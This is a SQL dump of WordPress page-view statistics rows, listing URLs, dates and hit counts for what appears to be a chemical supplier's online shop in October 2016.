INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-19', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1117', '2016-10-19', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/', '2016-10-19', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-19', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/', '2016-10-19', 2, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-222x/', '2016-10-19', 2, 1648); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-222x/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1648); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-19', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-19', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-19', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/', '2016-10-19', 1, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-19', 2, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-19', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-19', 9, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-19', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ab/', '2016-10-19', 1, 581); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-19', 3, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-19', 3, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2507', '2016-10-19', 1, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-19', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/', '2016-10-19', 1, 1834); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-19', 5, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-19', 5, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-19', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal/', '2016-10-19', 1, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/', '2016-10-19', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1163/', '2016-10-19', 1, 1019); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-028/', '2016-10-19', 2, 984); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-182/', '2016-10-19', 1, 973); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-19', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-19', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-19', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-19', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-10-19', 3, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-19', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-19', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-19', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-19', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-10-19', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-19', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-19', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-10-19', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-10-19', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3253/', '2016-10-19', 1, 1865); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-19', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-834/', '2016-10-19', 1, 885); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-834/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 885); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-19', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ad/', '2016-10-19', 1, 648); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ad/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 648); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-19', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-19', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-19', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-19', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-19', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-19', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-19', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-19', 4, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/', '2016-10-19', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a3/', '2016-10-19', 1, 996); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a4/', '2016-10-19', 1, 997); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-10-19', 1, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions', '2016-10-19', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-19', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a3/', '2016-10-19', 1, 1011); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/', '2016-10-19', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-19', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-19', 4, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-19', 3, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-217/', '2016-10-19', 1, 824); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-217/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 824); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-19', 2, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-19', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-20', 8, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-20', 5902, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-20', 136, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-20', 74, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-20', 3, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-20', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-20', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-20', 45, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-20', 49, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-20', 11, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-20', 4, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-20', 4, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-20', 4, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-20', 6, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-20', 5, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent', '2016-10-20', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?print=y', '2016-10-20', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-20', 42, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-20', 17, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-20', 7, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-20', 4, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a4/', '2016-10-20', 1, 997); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-20', 3, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-20', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-20', 3, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/?wc-ajax=get_refreshed_fragments', '2016-10-20', 2, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-20', 2, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-10-20', 6, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/?wc-ajax=get_refreshed_fragments', '2016-10-20', 5, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-20', 16, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-20', 6, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-20', 7, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-20', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-20', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/vazo-52-5/', '2016-10-20', 1, 1341); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/vazo-52-5/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1341); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-10-20', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-20', 5, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/', '2016-10-20', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/', '2016-10-20', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-20', 2, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-20', 2, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-246/', '2016-10-20', 2, 1088); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-246/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1088); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-107/', '2016-10-20', 1, 1227); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-107/heloxy-107/', '2016-10-20', 1, 1228); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-heloxy-modifier-107/', '2016-10-20', 1, 1441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-107/heloxy-107/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1228); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-107/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1227); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-heloxy-modifier-107/?wc-ajax=get_refreshed_fragments', '2016-10-20', 2, 1441); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-20', 11, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-20', 19, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-20', 4, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-20', 6, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-20', 8, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-20', 8, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-116/', '2016-10-20', 1, 1212); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-20', 6, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-20', 3, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-10-20', 2, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-20', 2, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-20', 11, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/vazo-67-2/', '2016-10-20', 1, 584); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/vazo-67-2/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 584); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-20', 6, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-20', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/', '2016-10-20', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-20', 8, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-20', 2, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-20', 5, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-20', 5, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-20', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-20', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-20', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-20', 3, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-20', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-20', 4, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3370/', '2016-10-20', 1, 1061); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-20', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-10-20', 2, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-20', 2, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-20', 2, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-20', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/', '2016-10-20', 3, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-20', 10, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-20', 4, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-20', 3, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-10-20', 1, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-20', 4, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-20', 2, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-20', 2, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/?wc-ajax=get_refreshed_fragments', '2016-10-20', 2, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-20', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-20', 3, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-20', 2, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3245/', '2016-10-20', 1, 1187); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3245/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1187); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-20', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-20', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-20', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1031/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 948); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-10-20', 6, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-20', 2, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-20', 6, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-20', 6, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/', '2016-10-20', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-20', 3, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-20', 3, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-20', 1, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-20', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-20', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-20', 4, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ad/', '2016-10-20', 1, 648); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-834/', '2016-10-20', 2, 885); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ab/', '2016-10-20', 1, 654); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/', '2016-10-20', 1, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-20', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/', '2016-10-20', 2, 1834); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/eponex-1510/', '2016-10-20', 2, 986); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-20', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/', '2016-10-20', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/teflon-marine-grease/', '2016-10-20', 1, 1454); 
INSERT INTO `wp_statistics_pages` VALUES ('/teflon-marine-grease/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1454); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-20', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-20', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-20', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106', '2016-10-20', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-10-20', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-20', 3, 22); 
